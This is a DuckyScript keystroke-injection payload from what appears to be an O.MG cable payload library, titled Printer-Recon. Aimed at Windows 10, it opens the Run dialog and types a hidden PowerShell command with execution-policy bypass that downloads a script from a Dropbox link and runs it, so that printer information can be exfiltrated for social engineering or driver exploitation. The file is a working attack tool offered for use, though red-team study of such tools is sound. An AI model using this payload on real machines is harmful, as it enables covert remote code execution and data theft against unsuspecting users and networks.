omg-payloads/payloads/library/exfiltration/Printer-Recon/payload.txt

20 lines
683 B
Plaintext

REM_BLOCK
Title: Printer-Recon
Author: atomiczsec
Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl